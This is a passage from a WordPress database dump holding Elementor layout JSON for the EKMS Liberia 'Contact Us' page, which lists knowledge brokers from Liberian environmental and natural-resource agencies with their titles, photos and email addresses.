href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23353,3392,'_elementor_edit_mode','builder'),(23354,3392,'_elementor_template_type','wp-page'),(23355,3392,'_elementor_version','3.0.16'),(23356,3392,'_wp_page_template','default'),(23357,3392,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInn